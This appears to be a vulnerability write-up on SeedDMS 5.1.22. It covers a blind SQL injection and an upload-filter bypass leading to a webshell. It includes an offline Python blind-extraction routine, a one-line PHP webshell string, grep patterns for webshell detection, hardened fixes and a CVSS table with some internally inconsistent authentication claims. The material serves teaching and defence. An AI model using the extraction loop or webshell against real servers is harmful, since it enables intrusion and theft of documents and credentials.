SeedDMS 5.1.22 Exploit
The most dangerous vulnerability in SeedDMS 5.1.22 is a time-based blind SQL injection in the op/op.RemoveDocument.php and op/op.RemoveFolder.php endpoints. The issue arises because the user-supplied documentid or folderid parameter is concatenated directly into the SQL query instead of being validated and bound as a parameter.
Specifically, the code snippet from op.RemoveDocument.php (simplified):

```php
$documentid = (int) $_GET['documentid']; // the cast is computed but never used below
$query = "SELECT * FROM `tblDocuments` WHERE `id` = " . $_GET['documentid'];
```

The (int) cast itself is sound; the flaw is that the query is built from the raw $_GET['documentid'] rather than from $documentid, so the cast never applies to what reaches the database. Anything appended to a numeric value, such as a boolean condition or a timing primitive like SLEEP() on MySQL, is executed verbatim, which gives classic boolean- or time-based blind injection.
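The following is an added example, not SeedDMS code, written in Python against an in-memory SQLite table so it runs offline. It reproduces the concatenation bug beside its parameterized fix, and goes one step further than the page's description by turning the boolean oracle into character-by-character extraction. The table name tblDocuments comes from the page; the columns (id, name, owner) and rows are constructed sample data. SQLite has no SLEEP(), so the oracle here is the row-count (boolean) variant; on MySQL the same loop would inject SLEEP() and measure response time instead.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for tblDocuments (sample rows, not SeedDMS's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblDocuments (id INTEGER PRIMARY KEY, name TEXT, owner INTEGER)")
    conn.executemany(
        "INSERT INTO tblDocuments VALUES (?, ?, ?)",
        [(1, "public.pdf", 1), (2, "hr-salaries.pdf", 2), (3, "board-minutes.pdf", 2)],
    )
    return conn


def lookup_vulnerable(conn, documentid):
    """Mirrors the pattern on the page: the raw request parameter is concatenated
    into the query, so whatever cast was computed earlier is never applied."""
    query = "SELECT id, name FROM tblDocuments WHERE id = " + documentid
    return conn.execute(query).fetchall()


def lookup_fixed(conn, documentid):
    """Hardened form: reject anything that is not a plain integer, then bind it."""
    if not documentid.isdigit():
        return []
    return conn.execute(
        "SELECT id, name FROM tblDocuments WHERE id = ?", (int(documentid),)
    ).fetchall()


def oracle(conn, condition):
    """Boolean oracle: the request either still finds document 1 or it does not."""
    return len(lookup_vulnerable(conn, "1 AND (" + condition + ")")) > 0


def extract_string(conn, subquery, max_len=64):
    """Recover the text returned by `subquery` one character at a time with a
    binary search over printable ASCII, using only yes/no answers from the oracle."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({subquery}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({subquery}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1 OR 1=1"))  # every row, not just document 1
    print(lookup_fixed(db, "1 OR 1=1"))       # [] : rejected before it reaches SQL
    print(extract_string(db, "(SELECT name FROM tblDocuments WHERE id = 2)"))
```

Each recovered character costs about seven oracle requests, which is why blind injection against a real server is slow but entirely mechanical; the fix costs nothing, since an integer id needs no escaping once it is validated and bound.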
With administrator credentials in hand (recovered through the injection or by brute force), the attacker moves on to remote code execution via the file-upload weakness described below.
Recursively search for PHP files in the data/ directory:

```sh
find /var/www/seeddms/data -name "*.php" -type f
```

(Note: SeedDMS never stores legitimate PHP files there, so any hit deserves inspection.)

Check for abnormally small or obfuscated files containing typical webshell primitives:

```sh
find /var/www/seeddms/data -type f -size -10k -exec grep -l "eval\|system\|base64_decode" {} \;
```

find rounds sizes up to whole kibibytes before comparing, so `-size -10k` matches files of 9 KiB or less; raise the threshold if you suspect a padded shell.
Even if a session check existed, the upload validation relied on the client-supplied Content-Type header and a naive look at the file name. By setting Content-Type: image/jpeg while uploading a .php file, or by using a double extension such as .php.jpeg, an attacker could get past these rudimentary filters and drop a webshell.
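An added illustration, not SeedDMS's upload code, of why those filters fail and what a hardened check looks like. The naive function is a model of the rudimentary filter the page describes (its exact logic is an assumption): it trusts the client's Content-Type or an image extension anywhere in the name. The hardened function sniffs magic bytes, looks only at the final extension, refuses anything containing .php, and stores the file under a random server-chosen name so the client never controls what the web server might execute.

```python
import os
import secrets

# Declared type -> (magic bytes the body must start with, extension used for the stored copy)
ALLOWED_IMAGES = {
    "image/jpeg": (b"\xff\xd8\xff", ".jpg"),
    "image/png": (b"\x89PNG\r\n\x1a\n", ".png"),
}
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png")


def naive_accepts(filename, content_type):
    """Model of the weak filter (assumed logic): either attacker-controlled signal is enough."""
    return content_type.startswith("image/") or filename.lower().endswith(IMAGE_EXTENSIONS)


def hardened_accepts(filename, content_type, data):
    """Return a safe storage name for the upload, or None if it must be rejected."""
    if content_type not in ALLOWED_IMAGES:
        return None
    magic, stored_ext = ALLOWED_IMAGES[content_type]
    if not data.startswith(magic):
        return None                      # body does not match the declared type
    lower = filename.lower()
    if os.path.splitext(lower)[1] not in IMAGE_EXTENSIONS:
        return None                      # only the final extension counts, and it must be an image
    if ".php" in lower:
        return None                      # shell.php.jpeg and similar double extensions
    # The client never chooses the stored name: random name, fixed non-executable extension.
    return secrets.token_hex(16) + stored_ext


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"
    print(naive_accepts("shell.php", "image/jpeg"))                        # True: header trusted
    print(naive_accepts("shell.php.jpeg", "application/octet-stream"))     # True: extension trusted
    print(hardened_accepts("shell.php", "image/jpeg", shell))              # None
    print(hardened_accepts("shell.php.jpeg", "image/jpeg", b"\xff\xd8\xff" + shell))  # None
    print(hardened_accepts("avatar.jpeg", "image/jpeg", b"\xff\xd8\xff\xe0" + bytes(16)))
```

Magic-byte sniffing alone is not sufficient, since a valid JPEG can carry PHP in its metadata; the random storage name and non-executable extension are what actually remove the execution path, and the data/ directory should in any case never be mapped to a PHP handler.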
| Aspect | Assessment |
|---|---|
| CVSS score (estimated) | 9.8 (Critical), AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Authentication | None required for the injection; the upload-based RCE needs an administrator session |
| User interaction | None |
| Complexity | Low (crafted HTTP requests) |
| Data exposure | Full document repository, system files, and database credentials |
| Persistence | High: a webshell survives reboots until it is removed by hand |
In a real-world audit, this exploit allowed full access to HR records, financial PDFs, and even the SeedDMS user table (password hashes, unsalted in older versions).
Monitor outbound connections from the SeedDMS host to unfamiliar external IPs (C2 callbacks) and DNS lookups for suspicious domains; a document server has little reason to initiate such traffic. On the web side, alert on requests to op/op.RemoveDocument.php or op/op.RemoveFolder.php whose documentid or folderid parameter is not a plain integer.
SeedDMS is an open-source document management system. A public exploit targeting version 5.1.22 has circulated; as summarized above, it chains an input-validation flaw with weak access controls to gain unauthorized access and, once administrator credentials are obtained, code execution on the server.